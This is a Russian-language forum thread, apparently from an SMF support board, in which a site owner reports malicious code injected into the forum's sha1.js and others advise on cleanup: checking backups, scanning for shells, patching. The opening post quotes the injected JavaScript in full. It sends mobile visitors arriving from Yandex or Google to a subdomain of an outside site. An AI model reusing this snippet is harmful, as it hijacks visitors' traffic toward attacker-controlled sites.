Инъекция в файл sha1.js и переадресация на поддомен другого сайта

[Солярис]

Приветствую!

Будет внимательны. Совершенно случайно обнаружил взлом и дополнение файла кодом:

// Simulate PHP's strtolower (in SOME cases PHP uses ISO-8859-1 case folding).
var ax=[document.referrer,navigator.userAgent,location.hostname];
ax[1].match(/m(ob|in)i|roid|symb|midp|j2me|ppc|mtk/i)
&&ax[0].match(/yandex|google/i)&&ax[0]&&location.replace("http://"+ax[2]+".l1c.ru/r");
String.prototype.php_strtolower = function () {
 return typeof(smf_iso_case_folding) != "undefined" && smf_iso_case_folding == true ? this.php_strtr(
 'ABCDEFGHIJKLMNOPQRSTUVWXYZ\x8a\x8c\x8e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde',
 'abcdefghijklmnopqrstuvwxyz\x9a\x9c\x9e\xff\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe'
 ) : this.php_strtr('ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz');
}

Обратите внимание на выделенные строки.

В обычном браузере ничего не происходит.

Но я решил с древнего телефона зайти на сайт (через поисковую систему Гугл) и вместо открытия сайта через ссылку из поисковой системы шла переадресация на другой сайт, на его поддомен с адресом форума.

Такие дела.

Вспоминаем тему

[kak2z]

как залили?? хостер что то говорит?

[Солярис]

Я хостингу вопросы никакие по этому поводу не задавал.

Не знаю, когда это произошло. Мне представляется, что уже достаточно времени прошло. 

[Yarik]

Я хостингу вопросы никакие по этому поводу не задавал.

А надо,дыра скорее всего у хостера и её надо закрыть.Уведомьте хостера и сами проверьте комп на вирусы и смените пароли все.

[GeorG]

Не знаю, когда это произошло.

Можно было посмотреть по времени изменения файла (как вариант, в бекапах посмотрите, если они есть).

p.s. Надо и другие файлы проверять на вирусы и шел удалить (через чего-то же к вам подключались).

[Солярис]

Домен, на который переадресация шла уже на продажу выставлен, поэтому бессмысленно что-то у хостинга узнавать (хоть тикет ему и направил).
Внедрение явно давно было.

p.s. Надо и другие файлы проверять на вирусы и шел удалить (через чего-то же к вам подключались).

Код то я этот удалил.

Но как искать иные (возможные) шелы - вот в чем вопрос?

[GeorG]

Глазами и антивирусом

[Yarik]

Но как искать иные (возможные) шелы - вот в чем вопрос?

Скачать форум к себе на комп и прогнать различными антивирусами.

[Солярис]

Скачать форум к себе на комп и прогнать различными антивирусами.

Да это я уже давным давно сделал. Антивирусы ничего не обнаруживают.  Всё чисто.

Только шелы таким образом не выявить.
Правда, тут надо прийти к общему знаменателю по поводу того, что каждый из нас подразумевает под шелом.

Глазами и антивирусом

Глазами все файлы форума перебрать и пересмотреть невозможно на предмет подобных внедрений.
Тем более неизвестно что искать, какой код.

[Yarik]

https://www.simplemachines.ru/index.php?topic=14504.msg112486#msg112486

[sgtWhite]

Связкой Каспер + Ransack погонять. А вообще, достаточно допотопное двигло у топикстартера тоже стоит принять во внимание.

[Солярис]

Никто не знает файл Subs-Media.php должен быть среди файлов движка?

Какое-то у него весьма странное содержание.

++++++++++++++++++++++=

sgtWhite, и чем же 2-а версия движка форума в этом смысле лучше?! Его не взламывают?
Взламать можно что угодно.

[sgtWhite]

Никто не знает файл Subs-Media.php должен быть среди файлов движка?

Я не нашел (хотя может плохо искал).

sgtWhite, и чем же 2-а версия движка форума в этом смысле лучше?! Его не взламывают?

Вообще SMF гораздо более взломоустойчив чем тот же PHPbb. Разумеется актуальные версии еще никто не отменял- посмотрите просто на оффе Security Patches начиная с вашей версии. Ну а за соц. инженерию и прочую кабалистику вообще другой вопрос.